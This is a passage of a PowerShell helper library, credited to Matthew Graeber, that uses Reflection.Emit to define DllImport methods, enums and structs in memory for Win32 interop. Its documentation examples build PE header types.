                $TypeHash[$DllName] = $Module.GetType("$Namespace.$DllName")
            }
            else
            {
                $TypeHash[$DllName] = $Module.GetType($DllName)
            }
        }
        else
        {
            # Define one type for each DLL
            if (!$TypeHash.ContainsKey($DllName))
            {
                if ($Namespace)
                {
                    $TypeHash[$DllName] = $Module.DefineType("$Namespace.$DllName", 'Public,BeforeFieldInit')
                }
                else
                {
                    $TypeHash[$DllName] = $Module.DefineType($DllName, 'Public,BeforeFieldInit')
                }
            }

            $Method = $TypeHash[$DllName].DefineMethod(
                $FunctionName,
                'Public,Static,PinvokeImpl',
                $ReturnType,
                $ParameterTypes)

            # Make each ByRef parameter an Out parameter
            $i = 1
            foreach($Parameter in $ParameterTypes)
            {
                if ($Parameter.IsByRef)
                {
                    [void] $Method.DefineParameter($i, 'Out', $null)
                }

                $i++
            }

            $DllImport = [Runtime.InteropServices.DllImportAttribute]
            $SetLastErrorField = $DllImport.GetField('SetLastError')
            $CallingConventionField = $DllImport.GetField('CallingConvention')
            $CharsetField = $DllImport.GetField('CharSet')
            $EntryPointField = $DllImport.GetField('EntryPoint')
            if ($SetLastError) { $SLEValue = $True } else { $SLEValue = $False }

            if ($PSBoundParameters['EntryPoint']) { $ExportedFuncName = $EntryPoint } else { $ExportedFuncName = $FunctionName }

            # Equivalent to C# version of [DllImport(DllName)]
            $Constructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor([String])
            $DllImportAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($Constructor,
                $DllName, [Reflection.PropertyInfo[]] @(), [Object[]] @(),
                [Reflection.FieldInfo[]] @($SetLastErrorField,
                                           $CallingConventionField,
                                           $CharsetField,
                                           $EntryPointField),
                [Object[]] @($SLEValue,
                             ([Runtime.InteropServices.CallingConvention] $NativeCallingConvention),
                             ([Runtime.InteropServices.CharSet] $Charset),
                             $ExportedFuncName))

            $Method.SetCustomAttribute($DllImportAttribute)
        }
    }

    END
    {
        if ($Module -is [Reflection.Assembly])
        {
            return $TypeHash
        }

        $ReturnTypes = @{}

        foreach ($Key in $TypeHash.Keys)
        {
            $Type = $TypeHash[$Key].CreateType()

            $ReturnTypes[$Key] = $Type
        }

        return $ReturnTypes
    }
}


function psenum {
<#
.SYNOPSIS
Creates an in-memory enumeration for use in your PowerShell session.
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
The 'psenum' function facilitates the creation of enums entirely in
memory using as close to a "C style" as PowerShell will allow.
.PARAMETER Module
The in-memory module that will host the enum. Use
New-InMemoryModule to define an in-memory module.
.PARAMETER FullName
The fully-qualified name of the enum.
.PARAMETER Type
The type of each enum element.
.PARAMETER EnumElements
A hashtable of enum elements.
.PARAMETER Bitfield
Specifies that the enum should be treated as a bitfield.
.EXAMPLE
$Mod = New-InMemoryModule -ModuleName Win32
$ImageSubsystem = psenum $Mod PE.IMAGE_SUBSYSTEM UInt16 @{
    UNKNOWN =                  0
    NATIVE =                   1 # Image doesn't require a subsystem.
    WINDOWS_GUI =              2 # Image runs in the Windows GUI subsystem.
    WINDOWS_CUI =              3 # Image runs in the Windows character subsystem.
    OS2_CUI =                  5 # Image runs in the OS/2 character subsystem.
    POSIX_CUI =                7 # Image runs in the Posix character subsystem.
    NATIVE_WINDOWS =           8 # Image is a native Win9x driver.
    WINDOWS_CE_GUI =           9 # Image runs in the Windows CE subsystem.
    EFI_APPLICATION =          10
    EFI_BOOT_SERVICE_DRIVER =  11
    EFI_RUNTIME_DRIVER =       12
    EFI_ROM =                  13
    XBOX =                     14
    WINDOWS_BOOT_APPLICATION = 16
}
.NOTES
PowerShell purists may disagree with the naming of this function but
again, this was developed in such a way so as to emulate a "C style"
definition as closely as possible. Sorry, I'm not going to name it
New-Enum. :P
#>

    [OutputType([Type])]
    Param (
        [Parameter(Position = 0, Mandatory=$True)]
        [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
        $Module,

        [Parameter(Position = 1, Mandatory=$True)]
        [ValidateNotNullOrEmpty()]
        [String]
        $FullName,

        [Parameter(Position = 2, Mandatory=$True)]
        [Type]
        $Type,

        [Parameter(Position = 3, Mandatory=$True)]
        [ValidateNotNullOrEmpty()]
        [Hashtable]
        $EnumElements,

        [Switch]
        $Bitfield
    )

    if ($Module -is [Reflection.Assembly])
    {
        return ($Module.GetType($FullName))
    }

    $EnumType = $Type -as [Type]

    $EnumBuilder = $Module.DefineEnum($FullName, 'Public', $EnumType)

    if ($Bitfield)
    {
        $FlagsConstructor = [FlagsAttribute].GetConstructor(@())
        $FlagsCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($FlagsConstructor, @())
        $EnumBuilder.SetCustomAttribute($FlagsCustomAttribute)
    }

    foreach ($Key in $EnumElements.Keys)
    {
        # Apply the specified enum type to each element
        $null = $EnumBuilder.DefineLiteral($Key, $EnumElements[$Key] -as $EnumType)
    }

    $EnumBuilder.CreateType()
}


# A helper function used to reduce typing while defining struct
# fields.
function field {
    Param (
        [Parameter(Position = 0, Mandatory=$True)]
        [UInt16]
        $Position,

        [Parameter(Position = 1, Mandatory=$True)]
        [Type]
        $Type,

        [Parameter(Position = 2)]
        [UInt16]
        $Offset,

        [Object[]]
        $MarshalAs
    )

    @{
        Position = $Position
        Type = $Type -as [Type]
        Offset = $Offset
        MarshalAs = $MarshalAs
    }
}


function struct
{
<#
.SYNOPSIS
Creates an in-memory struct for use in your PowerShell session.
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: field
.DESCRIPTION
The 'struct' function facilitates the creation of structs entirely in
memory using as close to a "C style" as PowerShell will allow. Struct
fields are specified using a hashtable where each field of the struct
is comprosed of the order in which it should be defined, its .NET
type, and optionally, its offset and special marshaling attributes.
One of the features of 'struct' is that after your struct is defined,
it will come with a built-in GetSize method as well as an explicit
converter so that you can easily cast an IntPtr to the struct without
relying upon calling SizeOf and/or PtrToStructure in the Marshal
class.
.PARAMETER Module
The in-memory module that will host the struct. Use
New-InMemoryModule to define an in-memory module.
.PARAMETER FullName
The fully-qualified name of the struct.
.PARAMETER StructFields
A hashtable of fields. Use the 'field' helper function to ease
defining each field.
.PARAMETER PackingSize
Specifies the memory alignment of fields.
.PARAMETER ExplicitLayout
Indicates that an explicit offset for each field will be specified.
.EXAMPLE
$Mod = New-InMemoryModule -ModuleName Win32
$ImageDosSignature = psenum $Mod PE.IMAGE_DOS_SIGNATURE UInt16 @{
    DOS_SIGNATURE =    0x5A4D
    OS2_SIGNATURE =    0x454E
    OS2_SIGNATURE_LE = 0x454C
    VXD_SIGNATURE =    0x454C
}
$ImageDosHeader = struct $Mod PE.IMAGE_DOS_HEADER @{
    e_magic =    field 0 $ImageDosSignature
    e_cblp =     field 1 UInt16
    e_cp =       field 2 UInt16
    e_crlc =     field 3 UInt16
    e_cparhdr =  field 4 UInt16
    e_minalloc = field 5 UInt16
    e_maxalloc = field 6 UInt16
    e_ss =       field 7 UInt16
    e_sp =       field 8 UInt16
    e_csum =     field 9 UInt16
    e_ip =       field 10 UInt16
    e_cs =       field 11 UInt16
    e_lfarlc =   field 12 UInt16
    e_ovno =     field 13 UInt16
    e_res =      field 14 UInt16[] -MarshalAs @('ByValArray', 4)
    e_oemid =    field 15 UInt16
    e_oeminfo =  field 16 UInt16
    e_res2 =     field 17 UInt16[] -MarshalAs @('ByValArray', 10)
    e_lfanew =   field 18 Int32
}
# Example of using an explicit layout in order to create a union.
$TestUnion = struct $Mod TestUnion @{
    field1 = field 0 UInt32 0
    field2 = field 1 IntPtr 0
} -ExplicitLayout
.NOTES
PowerShell purists may disagree with the naming of this function but
again, this was developed in such a way so as to emulate a "C style"
definition as closely as possible. Sorry, I'm not going to name it
New-Struct. :P
#>

    [OutputType([Type])]
    Param (
        [Parameter(Position = 1, Mandatory=$True)]
        [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
        $Module,

        [Parameter(Position = 2, Mandatory=$True)]
        [ValidateNotNullOrEmpty()]
        [String]
        $FullName,

        [Parameter(Position = 3, Mandatory=$True)]
        [ValidateNotNullOrEmpty()]
        [Hashtable]
        $StructFields,

        [Reflection.Emit.PackingSize]
        $PackingSize = [Reflection.Emit.PackingSize]::Unspecified,

        [Switch]
        $ExplicitLayout
    )

    if ($Module -is [Reflection.Assembly])
    {
        return ($Module.GetType($FullName))
    }

    [Reflection.TypeAttributes] $StructAttributes = 'AnsiClass,
        Class,
        Public,
        Sealed,
        BeforeFieldInit'

    if ($ExplicitLayout)
    {
        $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::ExplicitLayout
    }
    else
    {
        $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::SequentialLayout
    }

    $StructBuilder = $Module.DefineType($FullName, $StructAttributes, [ValueType], $PackingSize)
    $ConstructorInfo = [Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
    $SizeConst = @([Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))

    $Fields = New-Object Hashtable[]($StructFields.Count)

    # Sort each field according to the orders specified
    # Unfortunately, PSv2 doesn't have the luxury of the
    # hashtable [Ordered] accelerator.
    foreach ($Field in $StructFields.Keys)
    {
        $Index = $StructFields[$Field]['Position']
        $Fields[$Index] = @{FieldName = $Field; Properties = $StructFields[$Field]}
    }

    foreach ($Field in $Fields)
    {
        $FieldName = $Field['FieldName']
        $FieldProp = $Field['Properties']

        $Offset = $FieldProp['Offset']
        $Type = $FieldProp['Type']
        $MarshalAs = $FieldProp['MarshalAs']

        $NewField = $StructBuilder.DefineField($FieldName, $Type, 'Public')

        if ($MarshalAs)
        {
            $UnmanagedType = $MarshalAs[0] -as ([Runtime.InteropServices.UnmanagedType])
            if ($MarshalAs[1])
            {
                $Size = $MarshalAs[1]
                $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo,
                    $UnmanagedType, $SizeConst, @($Size))
            }
            else
            {
                $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, [Object[]] @($UnmanagedType))
            }

            $NewField.SetCustomAttribute($AttribBuilder)
        }

        if ($ExplicitLayout) { $NewField.SetOffset($Offset) }
    }

    # Make the struct aware of its own size.
    # No more having to call [Runtime.InteropServices.Marshal]::SizeOf!
    $SizeMethod = $StructBuilder.DefineMethod('GetSize',
        'Public, Static',
        [Int],
        [Type[]] @())
    $ILGenerator = $SizeMethod.GetILGenerator()
    # Thanks for the help, Jason Shirk!
    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder)
    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call,
        [Type].GetMethod('GetTypeFromHandle'))
    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call,
        [Runtime.InteropServices.Marshal].GetMethod('SizeOf', [Type[]] @([Type])))
    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ret)

    # Allow for explicit casting from an IntPtr
    # No more having to call [Runtime.InteropServices.Marshal]::PtrToStructure!
    $ImplicitConverter = $StructBuilder.DefineMethod('op_Implicit',
        'PrivateScope, Public, Static, HideBySig, SpecialName',
        $StructBuilder,
        [Type[]] @([IntPtr]))
    $ILGenerator2 = $ImplicitConverter.GetILGenerator()
    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Nop)
    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldarg_0)
    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder)
    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call,
        [Type].GetMethod('GetTypeFromHandle'))
    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call,
        [Runtime.InteropServices.Marshal].GetMethod('PtrToStructure', [Type[]] @([IntPtr], [Type])))
    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Unbox_Any, $StructBuilder)
    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ret)

    $StructBuilder.CreateType()
}
